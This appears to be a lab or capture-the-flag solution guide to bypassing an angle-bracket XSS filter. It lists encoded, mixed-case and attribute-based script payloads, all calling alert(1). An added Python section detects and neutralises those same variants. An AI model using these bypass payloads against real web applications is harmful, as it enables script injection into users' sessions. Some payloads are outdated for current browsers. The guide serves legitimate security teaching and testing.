TL;DR
Angle-bracket filters block basic HTML tags such as <script> by rejecting the literal < and > characters. The filter can be bypassed with alternative encodings, case mixing, or HTML entities that the application decodes back into the tag before the browser sees it.
Solution Guide
- Understand the Filter: The filter most likely looks for literal angle brackets (< and >) in user input, with the aim of preventing direct injection of HTML tags.
- Alternative Encoding (HTML Entities): Replace the angle brackets with their named HTML entities:
    &lt; represents <
    &gt; represents >
  Try injecting:
    &lt;script&gt;alert(1)&lt;/script&gt;
  Once the application decodes the entities, the browser should interpret this as a script tag.
- Case Mixing: Some filters are case-sensitive. Try varying the case of the tag name, and of the entity names if the filter matches those too:
    <ScRiPt>alert(1)</sCrIpT>
    &lT;script&gT;alert(1)&lT;/script&gT;
- Double Encoding: If the server decodes HTML entities more than once, encode the entities themselves. For example, encode
    &lt;script&gt;alert(1)&lt;/script&gt;
  to
    &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
  The first decode yields the entity-encoded form, the second yields the tag.
- Using Character Codes: Use the decimal or hexadecimal character references for the angle brackets:
    Decimal:     &#60;script&#62;alert(1)&#60;/script&#62;
    Hexadecimal: &#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
- Tag Attributes: Inject the JavaScript into a tag attribute rather than a tag body. This often bypasses filters that only look at the main tag structure:
    <img src="javascript:alert(1)">
    <body onload=alert(1)>
- Context Matters: Where is the input being used? If it lands inside an attribute, you might need single quotes instead of double quotes:
    <img src='javascript:alert(1)'>
- URL Encoding: If the input is URL-decoded, try encoding the payload accordingly.
- Nested Tags: Sometimes nesting tags works:
    <a href="javascript:alert(1)"><script>alert(1)</script></a>
- Browser Variations: Different browsers handle XSS payloads differently. Test your payloads in multiple browsers (Chrome, Firefox, Safari, Edge).
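The list above is the attacker's view of a literal angle-bracket blocklist. As an added example that is not part of the original page, the Python below shows the defender's side of the same variants: the naive check the guide assumes, a detection normaliser that canonicalises the encodings listed here (URL encoding, named, decimal and hexadecimal references, double encoding, tag-name case) before inspecting the text, and the actual fix, entity-encoding at the point where the value is written into HTML. The function names, the constructed sample inputs and the decoding depth of three rounds are my assumptions, not anything the page prescribes.

```python
import html
import re
import urllib.parse

# Constructed sample inputs: the encoded variants listed on this page,
# plus one benign string that legitimately contains a comparison.
SAMPLES = {
    "plain":      "<script>alert(1)</script>",
    "entities":   "&lt;script&gt;alert(1)&lt;/script&gt;",
    "mixed_case": "<ScRiPt>alert(1)</sCrIpT>",
    "double":     "&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;",
    "decimal":    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "hex":        "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
    "url":        "%3Cscript%3Ealert(1)%3C/script%3E",
    "attribute":  '<img src="javascript:alert(1)">',
    "handler":    "<body onload=alert(1)>",
    "benign":     "2 < 3 and 4 > 1, as expected",
}


def naive_filter_blocks(user_input: str) -> bool:
    """The filter the guide assumes: reject only literal angle brackets."""
    return "<" in user_input or ">" in user_input


def normalize(user_input: str, max_rounds: int = 3) -> str:
    """Canonicalise input the way the browser eventually will.

    Repeatedly URL-decode and HTML-entity-decode until the text stops
    changing (bounded so a pathological input cannot loop), then lower-case
    so tag-name case mixing does not matter. This is for inspection only,
    never for producing output.
    """
    current = user_input
    for _ in range(max_rounds):
        decoded = html.unescape(urllib.parse.unquote(current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


# Markup patterns checked *after* normalisation: an opening or closing tag,
# a javascript: URL, or an on*= event-handler attribute.
_MARKUP = re.compile(r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=")


def looks_like_markup(user_input: str) -> bool:
    """Detection: does the input contain markup once fully decoded?"""
    return _MARKUP.search(normalize(user_input)) is not None


def encode_for_html(value: str) -> str:
    """Mitigation: entity-encode at the point the value is written into HTML.

    quote=True also encodes both quote characters, so the result is inert
    inside a double- or single-quoted attribute as well as in text content.
    """
    return html.escape(value, quote=True)


def classify(user_input: str) -> dict:
    """Summarise how one input fares against each approach."""
    return {
        "naive_filter_blocks": naive_filter_blocks(user_input),
        "detected_after_normalize": looks_like_markup(user_input),
        "safe_output": encode_for_html(user_input),
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:12} {classify(sample)}")
```

Running it shows the two failure modes of the blocklist at once: the naive check rejects the benign comparison string while passing every encoded variant, whereas the normaliser flags all of the page's variants and leaves the benign string alone. The real fix is the last column: with output encoding applied at the sink, even a payload that survives every filter is rendered as literal text, and an already entity-encoded input simply displays as the text `&lt;script&gt;` rather than decoding into a tag.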
Remember to always test responsibly and only on systems you have permission to assess.